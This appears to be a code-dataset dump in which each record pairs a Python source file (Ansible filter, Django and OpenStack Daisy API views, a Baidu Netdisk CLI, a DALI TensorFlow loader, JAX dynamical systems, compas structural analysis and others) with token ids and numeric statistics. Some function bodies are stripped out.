            # No usable range spec at all -> surface a filter usage error.
            raise errors.AnsibleFilterError(
                f"expand_range filter error: No valid range found in '{text}'!"
            )
        base, spec = match[0]
        lo, hi = (int(bound) for bound in spec.strip("[]").split(":"))
        return [f"{base}{number}" for number in range(lo, hi + 1)]
| [
11748,
302,
198,
6738,
9093,
856,
1330,
8563,
628,
198,
4871,
25853,
26796,
25,
198,
220,
220,
220,
37227,
7469,
1127,
257,
8106,
8265,
2134,
526,
15931,
628,
220,
220,
220,
2488,
12708,
24396,
198,
220,
220,
220,
825,
16628,
33529,
1... | 2.356187 | 598 |
"""Users views."""
# Django
from django.shortcuts import get_object_or_404
# Django REST Framework
from rest_framework import mixins, status, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework.permissions import (
AllowAny,
IsAuthenticated,
)
from rest_framework.views import APIView
# Custom permissions
from sunnysouth.marketplace.permissions.users import IsSuperUser, IsAccountOwner
# Serializers
from sunnysouth.marketplace.serializers import AssetModelSerializer, AssetSerializer
# Models
import sunnysouth.marketplace.models as attachables
| [
37811,
14490,
5009,
526,
15931,
198,
2,
37770,
198,
6738,
42625,
14208,
13,
19509,
23779,
1330,
651,
62,
15252,
62,
273,
62,
26429,
198,
198,
2,
37770,
30617,
25161,
198,
6738,
1334,
62,
30604,
1330,
5022,
1040,
11,
3722,
11,
5009,
10... | 3.645349 | 172 |
#!/usr/bin/python
# coding: utf-8
# -------------------------------------------------------------------
# Author: Sudem mail@szhcloud.cn
# A few words at the front of the project
#
# Many thanks to the BT panel team for giving me this platform; this is my
# last piece of work before the end of the 2019 summer vacation.
# I learned a lot and gained a lot this summer -- it was very fulfilling.
# I will keep working hard and become an excellent little coder.
#
# Thanks to GitHub guru houtianze https://github.com/houtianze/bypy
# Your bypy project gave me the opportunity to learn Baidu API development.
# You are the pioneer of Baidu Netdisk on Linux; to express my gratitude and
# to carry on the spirit of open source and mutual help, this BDpan project
# is open-sourced on GitHub under the MIT license, allowing anyone to build
# modifications on top of it.
#
# Thanks to the ops and front-end teammates and my good roommates --
# my brothers' support is the biggest motivation on my path of growth.
#--------------------------------------------------------------------
import os,json,requests,base64,sys,datetime,getopt,math
import logging,warnings

# Timestamped INFO-level logging for the whole script.
logging.basicConfig(level = logging.INFO,format = '%(asctime)s %(message)s')
logger = logging.getLogger(__name__)
# NOTE(review): suppresses *all* warnings globally -- this also hides
# deprecation warnings; confirm this is intentional.
warnings.filterwarnings("ignore")

# Set the working directory (BT panel installation root).
os.chdir("/www/server/panel")
# Add the panel's package path and import its shared 'public' package.
sys.path.append("class/")
import public
# Command-line mode (CLI entry point).
# NOTE(review): this script is Python 2 (print statements); the BDpan class
# is defined elsewhere in the full module -- confirm before running this
# excerpt standalone.
if __name__ == '__main__':
    # Accumulators for the parsed command-line options.
    RunMode = ""
    FilePath = ""
    FileID = ""
    FileUpLoad = ""
    UploadPath = ""
    DownPath = ""
    argv = sys.argv[1:]
    try:
        # Option string: h/d/a/m/u are flags; p:, f:, s:, i: take a value.
        opts, args = getopt.getopt(argv, "hdamup:f:s:i:")
    except getopt.GetoptError:
        # Unknown option -> print usage and exit with a CLI error code.
        print 'Using BDpan.py with Param \n-d [DownLoadFile] \n-a [DownLoadPath] \n-u [UploadFile] \n-p <Upload/DownLoad File Path> \n-f <Baidu Pan FileID,Used Only In DownLoad Mode> \n-s <Baidu Pan FilePath,Used Only In Upload Mode> \n-m <Move File When Upload Success>'
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print 'Using BDpan.py with Param \n-d [DownLoadFile] \n-a [DownLoadPath] \n-u [UploadFile] \n-p <Upload/DownLoad File Path> \n-f <Baidu Pan FileID,Used Only In Download Mode> \n-s <Baidu Pan FilePath,Used Only In Upload Mode> \n-m <Move File When Upload Success>'
            sys.exit()
        elif opt == '-d': RunMode = "DownLoad"
        elif opt == '-a':RunMode = "DownLoadPath"
        elif opt == '-u': RunMode = "Upload"
        elif opt == '-p': FilePath = arg
        elif opt == '-i': DownPath = arg
        elif opt == '-f': FileID = arg
        elif opt == '-s': UploadPath = arg
        elif opt == "-m": FileUpLoad = "move"
    # Dispatch to the selected operation on a BDpan instance.
    BD = BDpan()
    if RunMode == "DownLoad":
        BD.FileDownLoad(FilePath, FileID)
    elif RunMode == "DownLoadPath":
        BD.PathDownload(DownPath,FilePath)
    elif RunMode == "Upload":
        BD.FileUpload(FilePath,UploadPath,FileUpLoad)
    else:
        print "UnKnow Running Mode!"
        sys.exit(2)
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
2,
16529,
6329,
198,
2,
6434,
25,
14818,
368,
6920,
31,
82,
23548,
17721,
13,
31522,
198,
2,
10263,
228,
247,
28839,
101,
165,
94,
117,
33566,
106,
... | 1.73152 | 1,434 |
import glob
import os
import numpy as np
import random
from create_json_data_files import *
from update_data_src import *
from create_main_gbu_page import *
from create_state_gbu_pages import *
if __name__ == "__main__":
    # Clear the terminal first ('clear' is POSIX-only -- assumes a Unix shell).
    os.system("clear")
    # main_menu() presumably comes from one of the star imports above
    # (create_main_gbu_page?) -- confirm.
    main_menu()
11748,
15095,
198,
11748,
28686,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
4738,
198,
6738,
2251,
62,
17752,
62,
7890,
62,
16624,
1330,
1635,
198,
6738,
4296,
62,
7890,
62,
10677,
1330,
1635,
220,
198,
6738,
2251,
62,
12417,
62,
... | 2.955056 | 89 |
from dotenv import dotenv_values
import os
import pymongo
from bson.objectid import ObjectId
import dateutil
import json
import sys
from utils.logging import getLogger
# Module-wide logger (getLogger imported from utils.logging above).
_logger = getLogger(__name__)

# Load configuration from the repository-root .env file into a plain dict.
# Resolved path: <this file's directory>/../.env
_config = dict(
    dotenv_values(
        os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", ".env")
    )
)
def connect_mongo(alt_db_name=None):
    """
    Connect to MongoDB and return a database handle.

    Host, port, and database name come from the module-level ``_config``
    (loaded from the .env file). Pass ``alt_db_name`` to target a different
    database than the configured one (useful for testing).

    Parameters:
        alt_db_name (String):
            optional; overrides the database name from the .env file.
    """
    try:
        host = _config["MONGODB_HOST"]
        port = int(_config["MONGODB_PORT"])
        db_name = _config["MONGODB_NAME"]
        if alt_db_name:
            db_name = alt_db_name
        client = pymongo.MongoClient(host, port=port)
        _logger.info(
            f"Successfully connected to mongodb at {host}:{port} db_name: {db_name}"
        )
        return client[db_name]
    except Exception as e:
        # Any failure (missing config key, connection error) is fatal here.
        _logger.error(f"Error occured {e}")
        sys.exit(1)
| [
6738,
16605,
24330,
1330,
16605,
24330,
62,
27160,
198,
11748,
28686,
198,
11748,
279,
4948,
25162,
198,
6738,
275,
1559,
13,
15252,
312,
1330,
9515,
7390,
198,
11748,
3128,
22602,
198,
11748,
33918,
198,
11748,
25064,
198,
198,
6738,
338... | 2.265758 | 587 |
from random import sample
# Mega-Sena generator: each game ("jogo") is 6 distinct numbers in 1..60.
print('= PROGRAMA MEGASENA =')
n = int(input('\nQuantidade de jogos: '))
jogos = []
for i in range(n):
    # Fix: append the sorted game itself, not a single-element list wrapping
    # it (the original stored/printed nested brackets like [[4, 11, ...]]).
    jogos.append(sorted(sample(range(1, 61), 6)))
    print(f'Jogo {i + 1:2}:', jogos[i])
# Keep the console window open until the user presses Enter.
input()
| [
6738,
4738,
1330,
6291,
198,
4798,
10786,
28,
46805,
32,
337,
7156,
1921,
45510,
796,
11537,
198,
77,
796,
493,
7,
15414,
10786,
59,
77,
24915,
312,
671,
390,
48342,
418,
25,
705,
4008,
198,
198,
73,
519,
418,
796,
17635,
198,
1640,... | 2.323232 | 99 |
import asyncio
import logging
import aiosqlite
from typing import Dict, List, Optional, Tuple
from src.types.program import Program
from src.types.full_block import FullBlock
from src.types.header import HeaderData, Header
from src.types.header_block import HeaderBlock
from src.types.proof_of_space import ProofOfSpace
from src.types.sized_bytes import bytes32
from src.util.hash import std_hash
from src.util.ints import uint32, uint64
# Module-level logger, named after this module.
log = logging.getLogger(__name__)
| [
11748,
30351,
952,
198,
11748,
18931,
198,
11748,
257,
4267,
13976,
578,
198,
6738,
19720,
1330,
360,
713,
11,
7343,
11,
32233,
11,
309,
29291,
198,
198,
6738,
12351,
13,
19199,
13,
23065,
1330,
6118,
198,
6738,
12351,
13,
19199,
13,
... | 3.467153 | 137 |
# Copyright (c) 2017-2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import os
import glob
# Discover all DALI TensorFlow plugin binaries shipped next to this file.
_tf_plugins = glob.glob(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'libdali_tf*.so'))
# Holds the first plugin that loads against the installed TF version.
_dali_tf_module = None
for _libdali_tf in _tf_plugins:
  try:
    _dali_tf_module = tf.load_op_library(_libdali_tf)
    break
  # if plugin is not compatible (built for another TF version) skip it
  except tf.errors.NotFoundError:
    pass
else:
  # for/else: reached only when no plugin loaded (or none were found).
  raise Exception('No matching DALI plugin found for installed TensorFlow version')
# The raw 'dali' op exposed by the successfully loaded plugin library.
_dali_tf = _dali_tf_module.dali
def DALIIteratorWrapper(pipeline = None, serialized_pipeline = None, **kwargs):
    """
    TF Plugin Wrapper

    Thin convenience layer over the DALI TensorFlow plugin op: it accepts
    either an already-serialized pipeline or a Pipeline object, which is
    serialized internally before being handed to the plugin. For more
    information, please look **TensorFlow Plugin API reference** in the
    documentation.
    """
    # Serialize only when the caller passed a live Pipeline object.
    blob = pipeline.serialize() if serialized_pipeline is None else serialized_pipeline
    return _dali_tf(serialized_pipeline=blob, **kwargs)
# Vanilla raw operator legacy: mirror docstrings onto the public names.
# NOTE(review): DALIIterator / DALIRawIterator are not defined in this
# excerpt -- presumably created earlier in the full module; confirm.
DALIIterator.__doc__ = DALIIteratorWrapper.__doc__
DALIRawIterator.__doc__ = _dali_tf.__doc__
| [
2,
15069,
357,
66,
8,
2177,
12,
7908,
11,
15127,
23929,
44680,
6234,
13,
1439,
2489,
10395,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
... | 3.186813 | 546 |
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
/clusters endpoint for Daisy v1 API
"""
import copy
from oslo_config import cfg
from oslo_log import log as logging
from webob.exc import HTTPBadRequest
from webob.exc import HTTPConflict
from webob.exc import HTTPForbidden
from webob.exc import HTTPNotFound
from webob import Response
from daisy.api import policy
import daisy.api.v1
from daisy.api.v1 import controller
from daisy.api.v1 import filters
from daisy.common import exception
from daisy.common import property_utils
from daisy.common import utils
from daisy.common import wsgi
from daisy import i18n
from daisy import notifier
import daisy.registry.client.v1.api as registry
LOG = logging.getLogger(__name__)
_ = i18n._
_LE = i18n._LE
_LI = i18n._LI
_LW = i18n._LW
SUPPORTED_PARAMS = daisy.api.v1.SUPPORTED_PARAMS
SUPPORTED_FILTERS = daisy.api.v1.SUPPORTED_FILTERS
ACTIVE_IMMUTABLE = daisy.api.v1.ACTIVE_IMMUTABLE
CONF = cfg.CONF
CONF.import_opt('disk_formats', 'daisy.common.config', group='image_format')
CONF.import_opt('container_formats', 'daisy.common.config',
group='image_format')
CONF.import_opt('image_property_quota', 'daisy.common.config')
class Controller(controller.BaseController):
    """
    WSGI controller for the clusters resource in the Daisy v1 API.

    The clusters resource API is a RESTful web service for cluster data::

        GET    /clusters       -- brief metadata about all clusters
        GET    /clusters       -- detailed metadata about all clusters
        HEAD   /clusters/<ID>  -- metadata about the cluster with id <ID>
        GET    /clusters/<ID>  -- cluster data for the cluster with id <ID>
        POST   /clusters       -- store cluster data, return its metadata
        PUT    /clusters/<ID>  -- update metadata and/or upload data for <ID>
        DELETE /clusters/<ID>  -- delete the cluster with id <ID>
    """
    def check_params(f):
        """
        Decorator validating params for 'cluster_add' / 'cluster_update'.

        NOTE(review): 'wrapper' is not defined in the visible code -- the
        decorator body appears truncated in this excerpt; confirm against
        the full source before editing.

        :param f: Function handle for 'cluster_add' and 'cluster_update'.
        :return: f
        """
        return wrapper

    def _enforce(self, req, action, target=None):
        """Authorize an action against our policies."""
        if target is None:
            target = {}
        try:
            self.policy.enforce(req.context, action, target)
        except exception.Forbidden:
            # Map a policy denial onto an HTTP 403 response.
            raise HTTPForbidden()

    def _get_filters(self, req):
        """
        Return a dictionary of query param filters from the request.

        :param req: the Request object coming from the wsgi layer
        :retval a dict of key/value filters
        """
        query_filters = {}
        for param in req.params:
            if param in SUPPORTED_FILTERS:
                query_filters[param] = req.params.get(param)
            # NOTE(review): this validate() runs for *every* request param,
            # even ones not in SUPPORTED_FILTERS, where query_filters[param]
            # raises KeyError -- upstream code nests it under the 'if' above;
            # confirm intended behavior.
            if not filters.validate(param, query_filters[param]):
                raise HTTPBadRequest(_('Bad value passed to filter '
                                       '%(filter)s got %(val)s')
                                     % {'filter': param,
                                        'val': query_filters[param]})
        return query_filters

    def _get_query_params(self, req):
        """
        Extract the supported query params from the request.

        :param req: the WSGI Request object
        :retval dict of parameters that can be used by registry client
        """
        params = {'filters': self._get_filters(req)}
        for PARAM in SUPPORTED_PARAMS:
            if PARAM in req.params:
                params[PARAM] = req.params.get(PARAM)
        return params

    @utils.mutating
    @check_params
    def add_cluster(self, req, cluster_meta):
        """
        Add a new cluster to Daisy.

        :param req: The WSGI/Webob Request object
        :param cluster_meta: Mapping of metadata about the cluster
        :raises HTTPBadRequest if x-cluster-name is missing
        """
        self._enforce(req, 'add_cluster')
        cluster_name = cluster_meta["name"]
        # NOTE(review): Python-2 debug prints left in production code.
        print cluster_name
        print cluster_meta
        cluster_meta = registry.add_cluster_metadata(req.context, cluster_meta)
        return {'cluster_meta': cluster_meta}

    @utils.mutating
    def delete_cluster(self, req, id):
        """
        Delete a cluster from Daisy.

        :param req: The WSGI/Webob Request object
        :param id: The opaque cluster identifier
        :raises HTTPNotFound / HTTPForbidden / HTTPConflict on registry errors
        """
        self._enforce(req, 'delete_cluster')
        #cluster = self.get_cluster_meta_or_404(req, id)
        # NOTE(review): Python-2 debug print left in production code.
        print "delete_cluster:%s" % id
        try:
            registry.delete_cluster_metadata(req.context, id)
        except exception.NotFound as e:
            # Registry has no such cluster -> 404.
            msg = (_("Failed to find cluster to delete: %s") %
                   utils.exception_to_str(e))
            LOG.warn(msg)
            raise HTTPNotFound(explanation=msg,
                               request=req,
                               content_type="text/plain")
        except exception.Forbidden as e:
            # Caller lacks permission on this cluster -> 403.
            msg = (_("Forbidden to delete cluster: %s") %
                   utils.exception_to_str(e))
            LOG.warn(msg)
            raise HTTPForbidden(explanation=msg,
                                request=req,
                                content_type="text/plain")
        except exception.InUseByStore as e:
            # Cluster is still referenced by a store -> 409.
            msg = (_("cluster %(id)s could not be deleted because it is in use: "
                     "%(exc)s") % {"id": id, "exc": utils.exception_to_str(e)})
            LOG.warn(msg)
            raise HTTPConflict(explanation=msg,
                               request=req,
                               content_type="text/plain")
        else:
            #self.notifier.info('cluster.delete', cluster)
            return Response(body='', status=200)

    @utils.mutating
    def get_cluster(self, req, id):
        """
        Return metadata about a cluster in the HTTP response.

        :param req: The WSGI/Webob Request object
        :param id: The opaque cluster identifier
        :raises HTTPNotFound if cluster metadata is not available to user
        """
        self._enforce(req, 'get_cluster')
        cluster_meta = self.get_cluster_meta_or_404(req, id)
        return {'cluster_meta': cluster_meta}

    def detail(self, req):
        """
        Return detailed information for all available clusters.

        :param req: The WSGI/Webob Request object
        :retval The response body is a mapping of the following form::

            {'clusters': [
                {'id': <ID>,
                 'name': <NAME>,
                 'nodes': <NODES>,
                 'networks': <NETWORKS>,
                 'description': <DESCRIPTION>,
                 'created_at': <TIMESTAMP>,
                 'updated_at': <TIMESTAMP>,
                 'deleted_at': <TIMESTAMP>|<NONE>,}, ...
            ]}
        """
        self._enforce(req, 'get_clusters')
        params = self._get_query_params(req)
        try:
            clusters = registry.get_clusters_detail(req.context, **params)
        except exception.Invalid as e:
            raise HTTPBadRequest(explanation=e.msg, request=req)
        return dict(clusters=clusters)

    @utils.mutating
    @check_params
    def update_cluster(self, req, id, cluster_meta):
        """
        Update an existing cluster with the registry.

        :param req: The WSGI/Webob Request object
        :param id: The opaque cluster identifier
        :retval Returns the updated cluster information as a mapping
        """
        self._enforce(req, 'update_cluster')
        # NOTE(review): dict.has_key() and eval() are Python-2-isms; eval()
        # executes request-supplied strings as code -- a Python-3 port should
        # use 'in' and ast.literal_eval instead.
        if cluster_meta.has_key('nodes'):
            orig_keys = list(eval(cluster_meta['nodes']))
            for host_id in orig_keys:
                self._raise_404_if_host_deleted(req, host_id)
        if cluster_meta.has_key('networks'):
            orig_keys = list(eval(cluster_meta['networks']))
            for network_id in orig_keys:
                self._raise_404_if_network_deleted(req, network_id)
        orig_cluster_meta = self.get_cluster_meta_or_404(req, id)

        # Do not allow any updates on a deleted cluster.
        # Fix for LP Bug #1060930
        if orig_cluster_meta['deleted']:
            msg = _("Forbidden to update deleted cluster.")
            raise HTTPForbidden(explanation=msg,
                                request=req,
                                content_type="text/plain")
        try:
            cluster_meta = registry.update_cluster_metadata(req.context,
                                                            id,
                                                            cluster_meta)
        except exception.Invalid as e:
            # Bad update payload -> 400.
            msg = (_("Failed to update cluster metadata. Got error: %s") %
                   utils.exception_to_str(e))
            LOG.warn(msg)
            raise HTTPBadRequest(explanation=msg,
                                 request=req,
                                 content_type="text/plain")
        except exception.NotFound as e:
            # Cluster disappeared between lookup and update -> 404.
            msg = (_("Failed to find cluster to update: %s") %
                   utils.exception_to_str(e))
            LOG.warn(msg)
            raise HTTPNotFound(explanation=msg,
                               request=req,
                               content_type="text/plain")
        except exception.Forbidden as e:
            msg = (_("Forbidden to update cluster: %s") %
                   utils.exception_to_str(e))
            LOG.warn(msg)
            raise HTTPForbidden(explanation=msg,
                                request=req,
                                content_type="text/plain")
        except (exception.Conflict, exception.Duplicate) as e:
            LOG.warn(utils.exception_to_str(e))
            raise HTTPConflict(body=_('Cluster operation conflicts'),
                               request=req,
                               content_type='text/plain')
        else:
            # Emit a notification only on success.
            self.notifier.info('cluster.update', cluster_meta)

        return {'cluster_meta': cluster_meta}
class ProjectDeserializer(wsgi.JSONRequestDeserializer):
    """Handles deserialization of specific controller method requests.

    No overrides: inherits the default JSON request deserialization.
    """
class ProjectSerializer(wsgi.JSONResponseSerializer):
    """Handles serialization of specific controller method responses.

    No overrides: inherits the default JSON response serialization.
    """
def create_resource():
    """Projects resource factory method.

    Wires the clusters Controller to its JSON (de)serializers and returns
    the resulting WSGI resource.
    """
    return wsgi.Resource(Controller(), ProjectDeserializer(), ProjectSerializer())
| [
2,
15069,
2211,
4946,
25896,
5693,
198,
2,
1439,
6923,
33876,
13,
198,
2,
198,
2,
220,
220,
220,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
345,
743,
198,
2,
220,
220,
220,
407,
779,
428,
... | 2.186828 | 5,208 |
#
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from transformers import TFTrainingArguments, TrainingArguments
from transformers4rec.config import trainer
| [
2,
198,
2,
15069,
357,
66,
8,
33448,
11,
15127,
23929,
44680,
6234,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
... | 3.805405 | 185 |
from ._tomlib import STree
from ._tomlib import Node, EdgeNode, PathNode, Position, MultiPosition, PositionRelevance
from ._tomlib import DFSIterator, PrefixIterator, PostfixIterator
from ._tomlib import COLOR, INDEX, INTERNAL, ROOT, VALID
| [
6738,
47540,
39532,
8019,
1330,
3563,
631,
198,
6738,
47540,
39532,
8019,
1330,
19081,
11,
13113,
19667,
11,
10644,
19667,
11,
23158,
11,
15237,
26545,
11,
23158,
3041,
2768,
590,
198,
6738,
47540,
39532,
8019,
1330,
360,
10652,
37787,
11... | 3.478261 | 69 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ssd1306.py
# @Author : (Zack Huang)
# @Link :
# @Date : 12/16/2021, 11:22:36 AM
import Adafruit_SSD1306
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from datetime import datetime
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
198,
2,
264,
21282,
12952,
21,
13,
9078,
198,
2,
2488,
13838,
1058,
220,
357,
57,
441,
31663,
8,
198,
2,
2488,
... | 2.431193 | 109 |
# Library of nonlinear dynamical systems
# Usage: Every discrete xKF class inherits from NLDS.
# There are two ways to use this library in the discrete case:
# 1) Explicitly initialize a discrete NLDS object with the desired parameters,
# then pass it onto the xKF class of your choice.
# 2) Initialize the xKF object with the desired NLDS parameters using
# the .from_base constructor.
# Way 1 is preferable whenever you want to use the same NLDS for multiple
# filtering processes. Way 2 is preferred whenever you want to use a single NLDS
# for a single filtering process
# Author: Gerardo Durán-Martín (@gerdm)
import jax
from jax.random import split, multivariate_normal
import chex
from dataclasses import dataclass
from typing import Callable
@dataclass
class NLDS:
    """
    Base class for the nonlinear dynamical systems' module.

    Parameters
    ----------
    fz: function
        Nonlinear state transition function
    fx: function
        Nonlinear observation function
    Q: array(state_size, state_size) or function
        Nonlinear state transition noise covariance function
    R: array(obs_size, obs_size) or function
        Nonlinear observation noise covariance function
    alpha, beta, kappa: float
        Extra hyperparameters (presumably unscented-transform parameters
        used by UKF subclasses -- confirm against the xKF classes).
    d: int
        Auxiliary dimension parameter (default 0).
    """
    fz: Callable
    fx: Callable
    Q: chex.Array
    R: chex.Array
    alpha: float = 0.
    beta: float = 0.
    kappa: float = 0.
    d: int = 0

    def sample(self, key, x0, nsteps, obs=None):
        """
        Sample discrete elements of a nonlinear system.

        Parameters
        ----------
        key: jax.random.PRNGKey
        x0: array(state_size)
            Initial state of simulation
        nsteps: int
            Total number of steps to sample from the system
        obs: None, tuple of arrays
            Observed values to pass to fx and R

        Returns
        -------
        * array(nsamples, state_size)
            State-space values
        * array(nsamples, obs_size)
            Observed-space values
        """
        obs = () if obs is None else obs
        state_t = x0.copy()
        obs_t = self.fx(state_t)

        # Record dimensions on the instance from the initial state/observation.
        # NOTE(review): 'self.obs_t' stores the observation *size* (cf.
        # 'self.state_size') -- the name looks like it was meant to be
        # 'obs_size'; confirm before relying on it.
        self.state_size, *_ = state_t.shape
        self.obs_t, *_ = obs_t.shape

        init_state = (key, state_t)
        # NOTE(review): self.__sample_step is not defined in this excerpt;
        # the per-step transition is presumably defined elsewhere in the
        # full module -- confirm.
        _, hist = jax.lax.scan(self.__sample_step, init_state, obs, length=nsteps)
        return hist
| [
2,
10074,
286,
1729,
29127,
6382,
605,
3341,
198,
2,
29566,
25,
3887,
28810,
2124,
42,
37,
1398,
10639,
896,
422,
22879,
5258,
13,
198,
2,
1318,
389,
734,
2842,
284,
779,
428,
5888,
287,
262,
28810,
1339,
25,
198,
2,
352,
8,
11884... | 2.604308 | 882 |
from compas_cem.diagrams import TopologyDiagram
from compas_cem.elements import Node
from compas_cem.elements import TrailEdge
from compas_cem.elements import DeviationEdge
from compas_cem.loads import NodeLoad
from compas_cem.supports import NodeSupport
from compas_cem.equilibrium import static_equilibrium
from compas_cem.plotters import TopologyPlotter
from compas_cem.plotters import FormPlotter
# ------------------------------------------------------------------------------
# Input data: node coordinates and edge connectivity
# ------------------------------------------------------------------------------

node_coords = [(0, [0.0, 0.0, 0.0]),
               (1, [0.0, 1.0, 0.0]),
               (2, [0.0, 2.0, 0.0]),
               (3, [1.0, 0.0, 0.0]),
               (4, [1.0, 1.0, 0.0]),
               (5, [1.0, 2.0, 0.0])]

trail_edges = [(0, 1), (1, 2), (3, 4), (4, 5)]

deviation_edges = [(1, 4), (2, 5)]

# ------------------------------------------------------------------------------
# Build the topology diagram: nodes, trail and deviation edges
# ------------------------------------------------------------------------------

topology = TopologyDiagram()

for key, xyz in node_coords:
    topology.add_node(Node(key, xyz))

# Trail edges with a target length of -1.0.
for u, v in trail_edges:
    topology.add_edge(TrailEdge(u, v, length=-1.0))

# Direct deviation edges with a force of -1.0.
for u, v in deviation_edges:
    topology.add_edge(DeviationEdge(u, v, force=-1.0))

# Indirect deviation edges with a force of 1.0.
for u, v in [(1, 5), (1, 3), (2, 4)]:
    topology.add_edge(DeviationEdge(u, v, force=1.0))

# Supports at nodes 0 and 3.
topology.add_support(NodeSupport(0))
topology.add_support(NodeSupport(3))

# The same load vector is applied to nodes 2 and 5.
load_vector = [0.0, -1.0, 0.0]
for loaded_node in (2, 5):
    topology.add_load(NodeLoad(loaded_node, load_vector))

# ------------------------------------------------------------------------------
# Collect edge lines, then compute the equilibrium state
# ------------------------------------------------------------------------------

edge_lines = [topology.edge_coordinates(*edge) for edge in topology.edges()]

topology.build_trails()
form = static_equilibrium(topology, eta=1e-6, tmax=100, verbose=True)

# Report the reaction force at every support node.
for node in form.support_nodes():
    print(node, form.reaction_force(node))

# ------------------------------------------------------------------------------
# Visualize the topology diagram
# ------------------------------------------------------------------------------

plotter = TopologyPlotter(topology, figsize=(16, 9))
plotter.draw_loads(radius=0.025, draw_arrows=True, scale=0.5, gap=-0.55)
plotter.draw_nodes(radius=0.025)
plotter.draw_edges()
plotter.show()

# ------------------------------------------------------------------------------
# Visualize the resulting form diagram
# ------------------------------------------------------------------------------

plotter = FormPlotter(form, figsize=(16, 9))
plotter.draw_nodes(radius=0.025, text="key")
plotter.draw_edges(text="force")
plotter.draw_loads(scale=0.5, gap=-0.55)
plotter.draw_reactions(scale=0.25)
plotter.draw_segments(edge_lines)
plotter.show()
| [
6738,
552,
292,
62,
344,
76,
13,
10989,
6713,
82,
1330,
5849,
1435,
18683,
6713,
198,
198,
6738,
552,
292,
62,
344,
76,
13,
68,
3639,
1330,
19081,
198,
6738,
552,
292,
62,
344,
76,
13,
68,
3639,
1330,
13069,
37021,
198,
6738,
552,... | 3.815552 | 1,106 |
import base64
import json
import urllib.request
import logging
# Module-level logger, named after this module.
logger = logging.getLogger(__name__)
| [
11748,
2779,
2414,
198,
11748,
33918,
198,
11748,
2956,
297,
571,
13,
25927,
198,
11748,
18931,
198,
198,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
628
] | 3.1875 | 32 |
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
import os
| [
6738,
42625,
14208,
13,
9945,
1330,
4981,
198,
6738,
42625,
14208,
13,
26791,
1330,
640,
11340,
198,
6738,
42625,
14208,
13,
3642,
822,
13,
18439,
13,
27530,
1330,
11787,
198,
6738,
42625,
14208,
13,
6371,
82,
1330,
9575,
198,
11748,
28... | 3.547619 | 42 |
from numpy import *
from matplotlib.pyplot import *
from WaveBlocks.Plot import plotcf
# Unit circle sampled densely over one full turn.
theta = linspace(0, 2 * pi, 6000)
signal = exp(1.0j * theta)

fig = figure()
ax = fig.gca()

# Color-coded phase plot plus the real/imaginary/argument curves.
plotcf(theta, angle(signal), abs(signal))
ax.plot(theta, real(signal), "b-", label=r"$\Re y$")
ax.plot(theta, imag(signal), "g-", label=r"$\Im y$")
ax.plot(theta, angle(signal), "c-", label=r"$\arg y$")

ax.set_xlim(0, 2 * pi)

# x-axis ticks at multiples of pi/4, labeled as fractions of pi.
xtick_positions = (0, pi / 4, pi / 2, 3 * pi / 4, pi,
                   5 * pi / 4, 3 * pi / 2, 7 * pi / 4, 2 * pi)
xtick_labels = (r"$0$",
                r"$\frac{\pi}{4}$",
                r"$\frac{\pi}{2}$",
                r"$\frac{3\pi}{4}$",
                r"$\pi$",
                r"$\frac{5\pi}{4}$",
                r"$\frac{3\pi}{2}$",
                r"$\frac{7\pi}{4}$",
                r"$2\pi$")
ax.set_xticks(xtick_positions)
ax.set_xticklabels(xtick_labels)

# y-axis covers [-pi, pi] with the unit values marked.
ax.set_yticks((-pi, -1, 0, 1, pi))
ax.set_yticklabels((r"$-\pi$", r"$-1$", r"$0$", r"$1$", r"$\pi$"))

ax.grid(True)

fig.savefig("color_legend.png")
close(fig)
| [
6738,
299,
32152,
1330,
1635,
198,
6738,
2603,
29487,
8019,
13,
9078,
29487,
1330,
1635,
198,
6738,
17084,
45356,
13,
43328,
1330,
7110,
12993,
198,
198,
64,
796,
300,
1040,
10223,
7,
15,
11,
17,
9,
14415,
11,
43434,
8,
198,
88,
796... | 1.390791 | 847 |
#!/usr/bin/env python
# coding: utf-8
import pandas as pd
import matplotlib.pyplot as plt
